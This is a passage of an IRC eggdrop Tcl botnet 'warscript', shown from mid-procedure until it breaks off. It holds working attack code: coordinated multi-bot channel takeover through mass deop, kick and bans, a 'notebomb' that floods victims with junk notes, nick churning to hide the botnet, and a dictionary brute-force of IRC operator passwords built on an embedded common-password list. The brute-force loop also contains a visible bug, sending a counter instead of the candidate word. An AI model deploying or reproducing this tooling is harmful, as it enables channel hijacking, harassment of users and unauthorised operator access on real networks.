  putcmdlog "[sv] \[security alert\] $nick supplied a wrong password for a msg command!"
  putnotc $nick "Wrong password, attempt has been logged." ; return 0
 }
 set channel [lindex $arg 1]
 if {$channel == ""} {
  putnotc $nick "Please specify your password and a channel!" ; return 0
 }
 if {[lsearch [string tolower [channels]] [string tolower $channel]] == 0} {
  putnotc $nick "Sorry but $channel is my home channel!" ; return 0
 }
 putnotc $nick "Removed channel $channel"
 putcmdlog "[sv] \[notice\] $nick ($uhost) made me join $channel."
 channel remove $channel ; return 0
}
proc msg:link {nick host handle arg} {
 set pass [lindex $arg 0]
 if {[passwdok $handle $pass] == "0"} {
  putcmdlog "[sv] \[security alert\] $nick supplied a wrong password for a msg command!"
  putnotc $nick "Wrong password, attempt has been logged." ; return 0
 }
 set who [lindex $arg 1]
 if {[matchattr $who b] != 1} {
  putnotc $nick "Sorry, $who is not a known bot" ; return 0
 }
 link $who ; putnotc $nick "Attempting to link to $who" ; return 0
}
proc msg:domsg {nick host handle arg} {
 set pass [lindex $arg 0]
 if {[passwdok $handle $pass] == "0"} {
  putcmdlog "[sv] \[security alert\] $nick supplied a wrong password for a msg command!"
  putnotc $nick "Wrong password, attempt has been logged." ; return 0
 }
 set who [lindex $arg 1] ; set msg [lrange $arg 2 end]
 if {$msg == ""} {
  putnotc $nick "Usage: msg <password> <nick> <message>" ; return 0
 }
 putserv "PRIVMSG $who :$msg"
 putnotc $nick "Messaged $who with: '$msg'" ; return 0
}
proc msg:raw {nick host handle arg} {
 set pass [lindex $arg 0] ; set raw [lrange $arg 1 end]
 if {[passwdok $handle $pass] == "0"} {
  putcmdlog "[sv] \[security alert\] $nick supplied a wrong password for a msg command!"
  putnotc $nick "Wrong password, attempt has been logged." ; return 0
 }
 if {$raw == ""} {
  putnotc $nick "No raw command given" ; return 0
 }
 putnotc $nick "Executed RAW command: $raw" ; putserv "$raw" ; return 0
}
proc msg:jump {nick host handle arg} {
 set pass [lindex $arg 0]
 if {[passwdok $handle $pass] == "0"} {
  putcmdlog "[sv] \[security alert\] $nick supplied a wrong password for a msg command!"
  putnotc $nick "Wrong password, attempt has been logged." ; return 0
 }
 set newserver [lindex $arg 1]
 if {$newserver == ""} {
  putcmdlog "[sv] \[notice\] - jumping servers"
  putnotc $nick "Jumped!" ; jump ; return 0
 }
 putcmdlog "[sv] \[notice\] - jumping servers - $newserver"
 putnotc $nick "Jumped to $newserver" ; jump $newserver ; return 0
}
proc msg:invite {nick host handle vars} {
 set pass [lindex $vars 0]
 if {$pass == ""} { putnotc $nick "Usage - #invite <password> \[channel\] \[nick\]" }
 if {[passwdok $handle $pass] == "0"} {
  putcmdlog "[sv] \[security alert\] $nick supplied a wrong password for a msg command!"
  putnotc $nick "Wrong password, attempt has been logged." ; return 0
 }
 set destchan [lindex $vars 1]
 if {$destchan == ""} {
  putcmdlog "[sv] \[notice\] Invited $nick ($host) to all active channels."
  putnotc $nick "Inviting you to all active channels, $nick"
  foreach channel [channels] { putserv "INVITE $nick $channel" } ; return 0
 }
 if {![onchan [boat] $destchan]} {
  putnotc $nick "I am not on $destchan" ; return 0
 }
 if {$vars == ""} {
  if {[onchan $nick $destchan]} {
   putserv "KICK $destchan $nick :You are, correction, [b]were[b] already on this channel."
   return 0
  }
  putnotc $nick "Inviting you to $destchan, $nick"
  putcmdlog "[sv] \[notice\] Invited $nick ($host) to $destchan"
  putserv "INVITE $nick $destchan" ; return 0
 }
 set destnick [lindex $vars 2]
 putnotc $nick "Inviting $destnick to $destchan"
 putnotc $destnick "You have been invited to $destchan by $nick"
 putcmdlog "[sv] \[notice\] $nick ($host) invited $destnick to $destchan"
 putserv "INVITE $destnick $destchan" ; return 0
}
putlog "[sv] \[init\] - 0x0e - secure message commands"
## 0x0f. TAKEOVER. take over, purge, and hold ops on channels
bind dcc m md dcc:tmassdeop
bind dcc m mo dcc:tmassop
bind dcc m mop dcc:tmassop
bind dcc m mk dcc:tmasskick
bind dcc m takeover dcc:take
bind dcc m banops dcc:banops
bind dcc m mb dcc:banops
bind dcc m cmd dcc:cmassdeop
bind dcc m cmk dcc:cmasskick
if {$limbo == 0} {
 bind join - * join:proc
 bind bot - t1 bot:t1 ; bind bot - t2 bot:t2
 bind bot - t3 bot:t3 ; bind bot - t4 bot:t4
}
global Takeover deopnicks mass ; dv Takeover 0 ; set deopnicks "" ; set mass 1
proc dcc:cmasskick {nick idx argz} {
 global cd_nicks ; set cd_nicks "" ; set arg [lindex $argz 0]
 if {$arg== "" || ![botonchan $arg]} {
  putdcc $idx "[sv] \[takeover\] - usage: .cmk #channel" ; return 1
 }
 if {![openchan $arg]} {
  putdcc $idx "[sv] \[takeover\] - please exempt $arg from hijack protection first"
  return 1
 }
 if {![botisop $arg]} {
  putdcc $idx "[sv] \[takeover\] - i need ops on $arg" ; return 1
 }
 update ; putcmdlog "[sv] \[takeover\] - coordinated mass kick on $arg by $nick"
 putallbots "t1 $arg" ; putdcc $idx "[sv] \[takeover\] - gathering opped bots, be patient"
 utimer 15 "cmass3 $nick $idx $arg" ; channel set $arg flood-deop 0:0
}
proc dcc:cmassdeop {nick idx argz} {
 global cd_nicks ; set cd_nicks "" ; set arg [lindex $argz 0]
 if {$arg== "" || ![botonchan $arg]} {
  putdcc $idx "[sv] \[takeover\] - usage: .cmd #channel" ; return 1
 }
 if {![openchan $arg]} {
  putdcc $idx "[sv] \[takeover\] - please exempt $arg from hijack protection first"
  return 1
 }
 if {![botisop $arg]} {
  putdcc $idx "[sv] \[takeover\] - i need ops on $arg" ; return 1
 }
 update ; putcmdlog "[sv] \[takeover\] - coordinated mass deop on $arg by $nick"
 putallbots "t1 $arg"
 putdcc $idx "[sv] \[takeover\] - gathering opped bots, be patient"
 utimer 15 "cmass2 $nick $idx $arg" ; channel set $arg flood-deop 0:0
}
proc bot:t1 {bot cmd arg} {
 if {[validchan $arg] && [botisop $arg]} {
  putbot $bot "t2" ; channel set $arg flood-deop 0:0
 }
}
proc bot:t2 {bot cmd arg} {
 global cd_nicks
 if {![info exists cd_nicks] || $cd_nicks==""} {
  set cd_nicks "$bot " } { append cd_nicks "$bot " }
}
proc cmass3 {nick idx chan} {
 global cd_nicks ; set bots $cd_nicks ; unset cd_nicks
 set howmany [llength $bots]
 if {$howmany < 3} {
  putdcc $idx "[sv] \[takeover\] - cancelled takeover: insufficient opped bots"
  return 0
 }
 putdcc $idx "[sv] \[takeover\] - starting coordinated takeover on $chan with $howmany bots"
 set ops ""
 foreach x [chanlist $chan] {
  set ok 1
  if {![isop $x $chan]} { set ok 0 } {
   foreach a $bots { 
    if {[string compare $a $x] == 0} { set ok 0 }
    if {[string compare ${a}_ $x] == 0} { set ok 0 }
   }
  }
  if {[string compare [boat] $x] == 0} { set ok 0 }
  if {[matchattr $x n]} { set ok 0 } ; if {[matchattr $x m]} { set ok 0 }
  if {[isown $x]} { set ok 0 } ; if {$ok} { append ops "$x " }
 }
 # Now the dangerous part...
 putserv "MODE $chan +stinm" ; set botno 0
 while {[llength $ops] > 0} {
  if {$botno >= $howmany} { set botno 0 }
  set now [lrange $ops 0 3] ; set ops [lrange $ops 4 end]
  putdcc $idx "[sv] \[takeover\] - [lindex $bots $botno] -> KICK $now"
  putbot [lindex $bots $botno] "t4 $nick $chan $now" ; incr botno
 }
 return 0
}
proc cmass2 {nick idx chan} {
 global cd_nicks ; set bots $cd_nicks ; unset cd_nicks
 set howmany [llength $bots]
 if {$howmany < 3} {
  putdcc $idx "[sv] \[takeover\] - cancelled takeover: insufficient opped bots"
  return 0
 }
 putdcc $idx "[sv] \[takeover\] - starting coordinated takeover on $chan with $howmany bots"
 set ops ""
 foreach x [chanlist $chan] {
  set ok 1
  if {![isop $x $chan]} { set ok 0 } {
   foreach a $bots { 
    if {[string compare $a $x] == 0} { set ok 0 }
    if {[string compare ${a}_ $x] == 0} { set ok 0 }
   }
  }
  if {[string compare [boat] $x] == 0} { set ok 0 }
  if {[matchattr $x n]} { set ok 0 } ; if {[matchattr $x m]} { set ok 0 }
  if {[isown $x]} { set ok 0 } ; if {$ok} { append ops "$x " }
 }
 # Now the dangerous part...
 putserv "MODE $chan +stinm" ; set botno 0
 while {[llength $ops] > 0} {
  if {$botno >= $howmany} { set botno 0 }
  set now [lrange $ops 0 3] ; set ops [lrange $ops 4 end]
  putdcc $idx "[sv] \[takeover\] - [lindex $bots $botno] -> DEOP $now"
  putbot [lindex $bots $botno] "t3 $nick $chan $now" ; incr botno
 }
 return 0
}
proc bot:t3 {bot cmd arg} {
 set nick [lindex $arg 0] ; set chan [lindex $arg 1]
 set deop [lrange $arg 2 5]
 if {![matchattr $nick m]} {
  ialarm 1 "takeover from $nick on $bot" ; return 0
 }
 putquick "MODE $chan -oooo $deop" ; catch "flushmode $chan"
 if {![botisop $chan]} {
  putcmdlog "[sv] \[takeover\] - cannot commence takeover, bouncing command..."
  putbot $bot "t3 $arg" ; return 0
 }
 putcmdlog "[sv] \[takeover\] - deop command from $nick @ $bot for $chan"
 return 0
}
proc bot:t4 {bot cmd arg} {
 set nick [lindex $arg 0] ; set chan [lindex $arg 1]
 set deop [lrange $arg 2 5]
 if {![matchattr $nick m]} {
  ialarm 1 "takeover from $nick on $bot" ; return 0
 }
 putquick "KICK $chan [lindex $deop 0] :\\"
 putquick "KICK $chan [lindex $deop 1] :\|"
 putquick "KICK $chan [lindex $deop 2] :\/"
 putquick "KICK $chan [lindex $deop 3] :\-" ; catch "flushmode $chan"
 if {![botisop $chan]} {
  putcmdlog "[sv] \[takeover\] - cannot commence takeover, bouncing command..."
  putbot $bot "t4 $arg" ; return 0
 }
 putcmdlog "[sv] \[takeover\] - deop command from $nick @ $bot for $chan"
 return 0
}
proc dcc:tmassdeop {nick idx argz} {
 global botnick mass ; set arg [lindex $argz 0]
 if {$arg== ""} {
  putdcc $idx "[sv] \[takeover\] - please enter a channel to massdeop on"
  return 1
 }
 if {$mass==1} {
  set deopnicks "" ; set massdeopz 0 ; set members [chanlist $arg]
  foreach who $members {
   if {[isop $who $arg] && ![onchansplit $who $arg] && $who != $botnick && $who != $nick} {
    if {$massdeopz < 4} {
     append deopnicks " $who" ; set massdeopz [expr $massdeopz + 1]
    }
    if {$massdeopz == 4} {
     set massdeopz 0
     putdcc $idx "[sv] \[takeover\] - deopped: ($arg) $deopnicks"
     putserv "MODE $arg -oooo $deopnicks"
     flushmode $arg ; set deopnicks "" ; append deopnicks " $who"
     set massdeopz 1
    }
   }
  }
  putserv "MODE $arg -oooo $deopnicks" ; flushmode $arg
  putdcc $idx "[sv] \[takeover\] - deopped: ($arg) $deopnicks - done!"
  putcmdlog "#$nick# massdeop"
 }
}
proc dcc:tmassop {nick idx argz} {
 global botnick mass ; set arg [lindex $argz 0]
 if {$arg== ""} {
  putdcc $idx "[sv] \[takeover\] - please enter a channel to massop on"
  return 1
 }
 if {$mass==1} {
  set opnicks "" ; set massopz 0 ; set members [chanlist $arg]
  foreach who $members {
   if {![isop $who $arg] && ![onchansplit $who $arg] && $who != $botnick} {
    if {$massopz < 4} {
     append opnicks " $who" ; set massopz [expr $massopz + 1]
    }
    if {$massopz == 4} {
     set massopz 0
     putdcc $idx "[sv] \[takeover\] - opped: ($arg) $opnicks"
     putserv "MODE $arg +oooo $opnicks"
     set opnicks "" ; append opnicks " $who" ; set massopz 1
    }
   }
  }
  putserv "MODE $arg +oooo $opnicks"
  putdcc $idx "[sv] \[takeover\] - opped: ($arg) $opnicks - done!"
  putlog "#$nick# massop"
 }
}
proc dcc:tmasskick {nick idx argz} {
 global botnick ; set arg [lindex $argz 0]
 if {$arg== ""} {
  putdcc $idx "[sv] \[takeover\] - please enter a channel to masskick on"
  return 1
 }
 set masslkz 1 ; set members [chanlist $arg]
 foreach who $members {
  if {![isop $who $arg] && ![onchansplit $who $arg] && $who != $botnick} {
   putserv "KICK $arg $who :lamer $masslkz owned by [sv]"
   set masslkz [expr $masslkz + 1]
  }
 }
}
proc dcc:take {hand idx arg} {
 global Takeover nick1
 if {$arg == ""} {
  putdcc $idx "[sv] \[takeover\] - please use 1 for on, 0 for off, #channel for specific channel"
  return 1
 }
 if {$arg == 1} {
  set Takeover 1
  putdcc $idx "[sv] \[takeover\] - [b]engaged[b] - kicking everybody joining my channels"
  return 1
 }
 if {$arg == 0} {
  set Takeover 0
  putdcc $idx "[sv] \[takeover\] - [b]disengaged[b] - no longer autokicking"
  global nick ; set nick $nick1 ; putserv "NICK $nick1"
  return 1
 }
 set Takeover $arg
 putdcc $idx "[sv] \[takeover\] - [b]engaged[b] - kicking everybody joining channel \"$arg\""
 return 1
}
proc join:proc {nickx uhost handle channel} {
 global Takeover owner botnick
 if {$nickx == $botnick} {
  if {[llength [bots]] > 0} {
   global botname ; putbot [randbot] "gop op $channel $botnick 0 $botname"
  }
  return 1
 }
 if {$Takeover != 0} {
  if {$Takeover == 1 || [string tolower $Takeover] == [string tolower $channel]} {
   if {![matchattr $handle o]} {
    putserv "KICK $channel $nickx :Owned by $owner and [sv]" ; change_nick
   }
  }
 }
}
proc randltr {} {
 set x [rand 63]
 return [string range "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz-0123456789" $x $x]
}
proc change_nick {} {
 global botnick
 set i [expr 9 - [string length $botnick]] ; set newnick $botnick
 for {set n 0} {$n < $i} {incr n} { set newnick "$newnick|[randltr]" }
 putserv "NICK $newnick"
}
proc dcc:banops {handle idx arg} {
 global botnick ; set chan [lindex $arg 0] ; set why [lrange $arg 1 end]
 set currdate [strftime "%d %b %Y"] ; set day [lindex $currdate 0]
 set amonth [lindex $currdate 1] ; set ayear [lindex $currdate 2]
 if {[lsearch -exact [string tolower [channels]] [string tolower $chan]] == -1} {
  putdcc $idx "[sv] \[takeover\] - I have never been on $chan" ; return 0
 }
 if {![onchan $botnick $chan]} {
  putdcc $idx "[sv] \[takeover\] - I need to get in $chan" ; return 0
 }
 switch $amonth {
  Jan {set month "1"} ; Feb {set month "2"} ; Mar {set month "3"} 
  Apr {set month "4"} ; May {set month "5"} ; Jun {set month "6"}
  Jul {set month "7"} ; Aug {set month "8"} ; Sep {set month "9"}
  Oct {set month "10"} ; Nov {set month "11"} ; Dec {set month "12"}
 }
 set year [string range $ayear 2 3] ; set bandate "\002$month-$day-$year\002"
 if {$why == ""} { set why "\002owned by\002 [sv]" }
 set why "$bandate:$why"
 foreach nick [chanlist $chan] {
  set who [nick2hand $nick $chan] ; set n2hand [nick2hand $who $chan]
  if {([llength $chan] != 1) || ([string first # $chan] == -1)} {
   putdcc $idx "[sv] \[takeover\] - please enter a channel" ; return 0
  }
  if {(![matchattr $who m] || ![matchattr $who n] || ![matchattr $who o]) && [isop $nick $chan] && $nick != $botnick} {
   set ban [maskhost [getchanhost $nick $chan]]
   regsub {\*!} $ban \*!\* da_ban ; set ban $da_ban
   putcmdlog "[sv] \[takeover\] - $nick ($ban) permbanned: $why"
   newchanban $chan $ban $botnick $why 0
  }
 }
 return 1
}
putlog "[sv] \[init\] - 0x0f - takeover ([b]warscript[b])"
## 0x10. NOTEBOMB. bomb users with notes to deny their access to console
bind dcc n notebomb notebomb
bind dcc n nb notebomb
set randchar "a b c d e f g h i j k l m n o p q r s t u v w x y z 0 1 2 3 4 5 6 7 8 9 ^ & * ( )  _ - + = Q W E R T Y U I O P A S D F G H J K L Z X C V B N M , . / < > ? ~"
proc notebomb {hand idx arg} {
 global max ; set victim [lindex $arg 0]
 set times [lindex $arg 1] ; set crap [lrange $arg 2 end]
 if {$victim == ""} {
  putdcc $idx "[sv] \[note bomber\] - please specify: <user\[@bot\]> \[times\] \[message\]"
  putdcc $idx "[sv] \[note bomber\] - \[times\] may be omitted, this will send 50 notes"
  putdcc $idx "[sv] \[note bomber\] - \[message\] my be ommited, random text will be used"
  return 0
 }
 if {$times == ""} {set times 50} ; if {$times < 0} {set times 50}
 if {$crap == ""} {set crap "reset"}
 fuck_em_up $hand $idx $victim $times $crap
}
proc fuck_em_up {hand idx victim times crap} {
 global nick
 putdcc $idx "[sv] \[note bomber\] - bombing $victim with [b]$times[b] notes"
 if {$crap == "reset"} {
  putcmdlog "#$hand# notebomb $victim $times" } {
  putcmdlog "#$hand# notebomb $victim $times \[$crap\]"}
 for {set i 0} {$i<$times} {incr i} { final_fuck_up $victim $times $crap }
}
proc final_fuck_up {victim times crap} {
 global randchar
 if {$crap == "reset"} {set crap ""}
 if {$crap == ""} {
  set q 0
  while {$q < 201} {
   append crap [lindex $randchar [rand [llength $randchar]]] ; incr q 1
  } }
 set j 0
 while {$j < 10} {
  append fakenick [lindex $randchar [rand [llength $randchar]]] ; incr j 1
 }
 sendnote $fakenick $victim $crap
}
putlog "[sv] \[init\] - 0x10 - note bomber ([b]warscript[b])"
## 0x11. NICK. nickname mass changes to flood from, hide and protect the botnet
bind dcc n rnick dcc:ragnarok
bind dcc n ragnarok dcc:ragnarok
bind dcc n xnick dcc:xnick
if {$limbo == 0} {
 bind bot - xnick bot:xnick
 bind bot - ragnarok bot:ragnarok
 bind bot - resumenick bot:resumenick
}
proc dcc:ragnarok {hand idx arg} {
 global nick1 nick
 if {$arg == "0"} {
  putcmdlog "[sv] \[ragnarok\] - nick resume command sent by [b]$hand[b]"
  set nick $nick1 ; putserv "NICK $nick1" ; utimer 5 resumealtnick
  putallbots resumenick ; return 0
 }
 if {![isown $hand]} {
  putdcc $idx "[sv] \[ragnarok\] - non-owners can only reset the bot nicks to normal"
  putcmdlog "[sv] \[ragnarok\] - $hand tried .ragnarok $arg - failed (not owner)"
  return 0
 }
 putcmdlog "[sv] \[ragnarok\] - chankill command sent by [b]$hand[b]"
 set rnick "[rword 9]" ; set nick $rnick ;  putserv "NICK $rnick"
 putallbots "ragnarok" ; return 0
}
proc bot:ragnarok {bot cmd arg} {
 global nick ; set bleh "[rword 9]" ; set nick $bleh
 putcmdlog "[sv] \[ragnarok\] - remote chankill from [b]$bot[b]"
 utimer [rand 30] "putserv \"NICK $bleh\"" ; return 0
}
proc bot:resumenick {bot cmd arg} {
 global nick1 nick
 putcmdlog "[sv] \[ragnarok\] - remote nick resume from [b]$bot[b]"
 set nick $nick1 ; putserv "NICK $nick1" ; utimer 5 resumealtnick ; return 0
}
proc resumealtnick {} {
 global botnick nick1 altnick nick
 if {$botnick != $nick1} {
  set nick $altnick ; putserv "NICK $altnick"
 }
 return 0
}
proc dcc:xnick {hand idx arg} {
 if {[lindex $arg 0]==""} {
  putdcc $idx "[sv] \[rangarok\] - usage: .xnick <basenick>" ; return 0
 }
 putcmdlog "[sv] \[ragnarok\] - xnick command sent by [b]$hand[b]"
 set base "[lindex $arg 0]" ; set nick "$base" ; putserv "NICK $base"
 set xnc 0
 foreach bottie [bots] {
  set bbase "$base-$xnc" ; putbot $bottie "xnick $bbase" ; incr xnc
 }
 return 0
}
proc bot:xnick {bot cmd arg} {
 global nick
 putcmdlog "[sv] \[ragnarok\] - remote xnick command from [b]$bot[b]"
 set base [lindex $arg 0] ; set nick $base ; putserv "NICK $base" ; return 0
}
proc do_restore_nick {} {
 global nick1 nick ; set nick $nick1
 putserv "NICK $nick1" ; utimer 5 resumealtnick
}
putlog "[sv] \[init\] - 0x11 - nick changing"
## 0x12. OPER. getting and maintaining operator status
bind dcc m kill cmd:kill
bind dcc n connect cmd:connect
bind dcc n squit cmd:squit
bind dcc n srehash cmd:rehash
bind dcc n hack dcc:hack
bind dcc m oper cmd:oper
if {$limbo == 0} { bind raw - 381 woah_oper }
proc cmd:oper {hand idx arg} {
 if {$arg ==""} {
  putdcc $idx "[sv] \[ircop bot\] - usage oper <my password>" ; return 1
 }
 global botnick ; putserv "oper $botnick $arg"
 putdcc $idx "[sv] \[ircop bot\] - tried /OPER $botnick $arg" ; return 1
}
proc cmd:kill {hand idx arg} {
 global network
 if {$arg == ""} {
  putdcc $idx "[sv] \[ircop bot\] - usage kill <nick> <kill message>" ; return 1
 }
 putserv "kill [lindex $arg 0] :[lindex $arg 1] [lindex $arg 2] [lindex $arg 3] [lindex $arg 4] [lindex $arg 5] [lindex $arg 6]"
 putcmdlog "[sv] \[ircop bot\] - $hand killed $arg from the $network irc network"
 return 1
}
proc cmd:connect {hand idx arg} {
 global network
 if {$arg == ""} {
  putdcc $idx "[sv] \[ircop bot\] - usage connect <server> \[<port> <server 2>\]"
  return 1
 }
 putcmdlog "[sv] \[ircop bot\] - $hand connected $arg on the $network irc network"
 putserv "connect $arg" ; return 1
}
proc cmd_squit {hand idx arg} {
 global network
 if {$arg == ""} {
  putdcc $idx "[sv] \[ircop bot\] - usage squit <server> \[comment\]"
  return 1
 }
 putserv "squit [lindex $arg 0] :[lindex $arg 1] [lindex $arg 2] [lindex $arg 3] [lindex $arg 4] [lindex $arg 5] [lindex $arg 6]"
 putcmdlog "[sv] \[ircop bot\] - $hand quitted server $arg from the $network irc network"
 return 1
}
proc cmd:rehash {hand idx arg} {
 putcmdlog "[sv] \[ircop bot\] - $hand rehashed the ircd config file"
 putserv "rehash" ; return 1
}
set wordlist {
 12345 abc123 password passwd 123456 newpass notused Hockey internet asshole
 Maddock 12345678 newuser computer Internet Mickey qwerty fiction Cowboys
 Jordan Hatton test Michael ou812 orange 1234 Beavis 123 tigger Soccer shadow
 Purple Sports dragon michael wheeling mustang Monkey Qwerty School Snoopy
 Vikings jennifer money Justin mickey 0246 a1b2c3 chris david foobar Robert
 buster harley jordan stupid * apple fred 123abc Amanda Dakota summer sunshine
 andrew hello maggie monday pascal patrick Dallas Jessica Nicole Sendit Smokey
 baseball daniel diamond joshua michelle mike silver 1q2w3e Friends George
 Shadow Summer bandit coffee falcon fuckyou pepper richard thomas undead !@#$%
 Andrew Buster Cowboy Eagles Elwood Master Nathan changeme charlie golf green
 linda merlin monkey nite secret soccer steve 1234567 Apples Dragon Flower
 Mustang Pepper george guest hockey james koko matthew pookie robert xxx
 Dolphin Killer Miller Packers Tigger alex canada john master Chicago Kitten
 Polaris Spanky Tennis Thomas Tweety hammer letmein magic murphy scooter
 service snoopy sophie thx1138 tiger Ashley Basket Ginger Nirvana Teacher
 Yellow blue dave hunter sarah thursday welcome Bandit Volley aaaaaa ashley
 bear boomer calvin dallas friday happy jason madison martin mother nicole
 purple ranger 123go Airhead Braves Sparky angela brandy cindy dakota donald
 football ncc1701 shannon soleil taylor tuesday Abcdef August Footbal Heather
 Johnson Maggie Matthew Michelle Monday Pookie Rabbit Richard Smiley amanda
 anthony camaro carmen cowboy genesis jesus joseph justin miller ncc1701d
 pamela picture princess rabbit rocket sierra steven success tennis victoria
 willow Abcdefg Bubba Charlie Compute Computer Fuckyou Hammer Jeremy Library
 Password Runner Scooter Shorty Silver Taylor Tigers Travis Viper digital duke
 freedom gandalf ginger heather iloveyou jessica killer lizard loser mark
 monica oscar peanut pentium peter phoenix piglet rainbow runner sam saturn
 scott skippy startrek temp 111111 123123 2welcome Basebal Batman Brandy Cassie
 Dustin Fishing Harley Hunter Orlando Peaches Scotty Steven Voyager andrea ass
 avalon batman brandon bubba casey eagle frog1 fuckme info love marie misty
 natasha newyork nss poohbear rachel turtle walter wizard 00000000 Daniel
 Friday Hornets Joshua Online Rodman Science andy asdf august austin beavis
 brenda brian butthead charles cheese doctor dolphin flower jonathan junior
 knight marley maverick molson morgan mouse nathan nissan rebecca shalom smile
 sparky stephen whatever william 696969 Anthony Casper Helpme Jessie Mother
 Pebbles Pentium Secret Sonics Viking Wolves access alpha angel ath banane bob
 bond007 booger boris chicken cookie elephant elvis emily eric france gizmo
 goober horses island jeffrey jerry joe jupiter justice lisa lucky mindy missy
 muffin music protel rose sandy sharon snake spider spring test1 tommy toyota
 vincent wqsb 7777 8675309 Barney Bowling Camaro Casio Cookie Froggy Golfer
 Junior Knights Lakers Melissa Patrick Rachel Raiders Reggie Shelly Shithead
 Speedy Thunder Windows albert alexande america7 banana barbara barney billy
 biteme black chelsea claire connie debbie delta dennis eeyore fishing fucker
 helpme honda indiana jackson jasmine karen kevin lestat logan louis louise
 micro mitchell nirvana none paul pepsi perry phantom pierre rascal red reddog
 roger sanjose1 simon star superman tom topgun wilson 654321 Aikman Animal
 Avatar Basketb Gandalf Hacker Hendrix Hunting Iceman Leslie Letmein Scooby
 Snicker System Tazman Tootsie Turtle abcd1234 adg amber anna annie arthur
 benjamin bill boston braves buddy cgj control coyote daisy dog dorothy 
 douglas edward faith family fish fisher ford freak1 friend grant iceman jack
 jeremy jim library marcel molly mountain nat nicarao olivia pat pearljam pmc
 ppp prince ryan salmon school skeeter special spencer stinky sunflowe teacher
 test123 tony travel viper wally winston winter wolf yellow zephyr ziggy !@#$%^
 1928 2112 90210 Arthur Biteme Blackie Boomer Bubbles Carrie Charles Denise
 Fender Fluffy Fucker Fuckme Golfing Intel Jasmine Joseph Knight Lindsey Loser
 Orange Peanut People Porsche Rebecca Rhonda Sanders Speech Tanner Teresa
 Turbo Volleyb Wrestle alaska apples asdfgh bigdog boss casper cat chapman
 chocolat christin classroo cocacola coke cougar cricket crystal danny david1
 dean disney einstein elizabet felix fox frank giants grace gregory hannah
 hendrix hola howard jake janice jesus1 julian kelsey kitten12 lacrosse lakers
 larry leslie marina matt melissa millie montana moose morris orion pantera
 paris piano pizza please popcorn q1w2e3 radio sales sammy shelly shithead
 stanley steelers stimpy student susan sydney tammy testtest texas thunder
 tweety victory virginia willie willy win95 zapata 1 Alaska Alicia Bailey
 Banana Beaner Bigdog Blazer Blondie Brandon Center Cheese Chicken Chris
 Compaq Dreams Falcon Family Fisher Flyers Friend FuckYou Global Gopher Guitar
 Gymnast Hearts Huskers Kinder Larson Lestat Lindsay Minnie Muffin Pamela
 Panther Picard Pyramid Raider Rainbow Reddog Sampler Shannon Shotgun Sierra
 Skeeter Spanish Stacey Student Trixie Xanadu Yankees Zombie a12345 a1b2c3d4
 abc adidas alexis angie april asdfjkl; baby betty bilbo bonnie booboo bradley
 brooke caitlin carrie chip chris1 christy cinder claude claudia colorado
 cowboys curtis daytek donna duck dusty eagle1 enigma francis francois franklin
 froggy gabriel ghost gopher grover happy1 helen henry honey horse house
 jackie jean jenny joey kelly laura lauren lincoln loveme margaret mary max
 mercedes mercury michel midnight mine mirror mozart nicholas nothing oliver
 packard pass peace phil porsche psycho pumpkin punkin puppy123 randy remember
 robin rosebud sadie sampson samson samuel simple smiley snowball spike
 starwars stever storm sun support suzanne sweetie sweetpea system tamara
 tech teresa terry theresa thumper victor vision water winner xavier yamaha
 121212 ABC123 America Arctic Austin Bonnie Cheryl Dorothy Drizzt Emmitt Farmer
 Flipper Goldie Goober Griffey Groovy Hotdog Jackson Jeffrey Jester Jimbo
 Johnny Kristi Lauren Lizard Louise Lover Montana Murphy NCC1701 PPP Pacers
 Packer Patches Peter RedDog Reebok Rosebud Sango Shadows Sharon Skippy Stanley
 Startrek Sunshin Swimmer TEACHERS Tinman Wildcat William Willie Wilson Yamaha
 aaron abigail alice allen amour animal archie bailey basf basketba beaver
 bingo blazer blonde bullshit business caroline cfj chicago clancy class
 cloclo colleen columbia connect country demo dixie domino donkey dreamer
 eagles eddie farmer fgh fire flipper flowers floyd fluffy freddy friends
 frodo frog garden global golfer grumpy hansolo hawk health heidi help holly
 hoops iguana indigo italia jane jasper jessie jewels johnny joker judith
 katherin kids kingfish kristi laurie legend lindsay london loveyou lucy
 mac marc marilyn market marlboro marty maryjane matrix maxwell nancy nascar
 nelson network newcourt newton packers panther papa parker patricia penguin
 pickle porsche9 rain raven robbie robert1 rocky roses sabrina sailing sandra
 science scotty seven shoes smiles smokey snickers speedy spooky stephani
 strat stuart sunny sunset telecom temporal tigers time tinker tomcat trebor
 tristan truck video viper1 visa volvo warren weasel webmaste white woody
 xanadu zaphod !@#$%^&* 007 1022 13579 4444 666666 6969 Adidas Asdfgh Asshole
 Awesome Biology Bond007 Booboo Bradley Buffalo Calvin Canada Celtics Chester
 Colleen Connie Cooper Cracker Digital Disney Doobie Dream Dwight Eatme Farming
 Florida Flowers Gizmo Goalie Golden Gunner Harvey Homer Jasper Kristy Krystal
 Laser Maddog Marino Marvin Natasha Nelson October Parker Passwor Petunia
 Prince Pumpkin Qwert Ranger Sammie Senior Shirley Slayer Spunky Tandy Trouble
 Vette Warren Wheels Winter Zxcvbnm 0 1 2 3 4 5 6 7 8 9 ! # @ $ a b c d e
 f g h i j k l m n o p q r s t u v w x y z
}
if {[info exists cracking]} {
 putcmdlog "[sv] \[ircop bot\] - cracking $nicktohack (word: [lindex $wordlist $wordnr]"
}
proc dcc:hack {hand idx arg} {
 global cracking wordnr wordlist nicktohack
 if {[info exists cracking]} {
  putdcc $idx "[sv] \[ircop bot\] - already cracking $nicktohack - word: [lindex $wordlist $wordcount]"
  return 1
 }
 set nicktohack [lindex $arg 0]
 if {$nicktohack == ""} {
  putdcc $idx "[sv] \[ircop bot\] - usage: .hack <oper nick> (e.g. GoodFella)"
  return 1
 }
 putcmdlog "[sv] \[ircop bot\] - beginning to get oper $nicktohack - requested by $hand"
 set nick $nicktohack ; putserv "NICK $nicktohack"
 set cracking 1 ; set wordnr 1 ; ophack 1
}
proc ophack counter {
 global cracking nicktohack wordnr wordlist nick1
 if {![info exists cracking]} {return -1}
 if {$counter > [llength $wordlist]} {
  putcmdlog "[sv] \[ircop bot\] - unsuccessfully finished cracking password for $nicktohack :("
  unset cracking ; unset nicktohack ; unset wordnr
  set nick $nick1 ; putserv "NICK $nick1" ; return 1
 }
 set hackword [lindex $wordlist $counter]
 putserv "OPER $nicktohack $counter"
 incr wordnr ; utimer 5 "ophack $wordnr" ; return 0
}
proc woah_oper {from keyword arg} {
 global cracking nicktohack wordnr nick1 botnick wordlist
 putcmdlog "[sv] \[ircop bot\] THIS BOT IS NOW OPER ON $from"
 if {[info exists cracking]} {
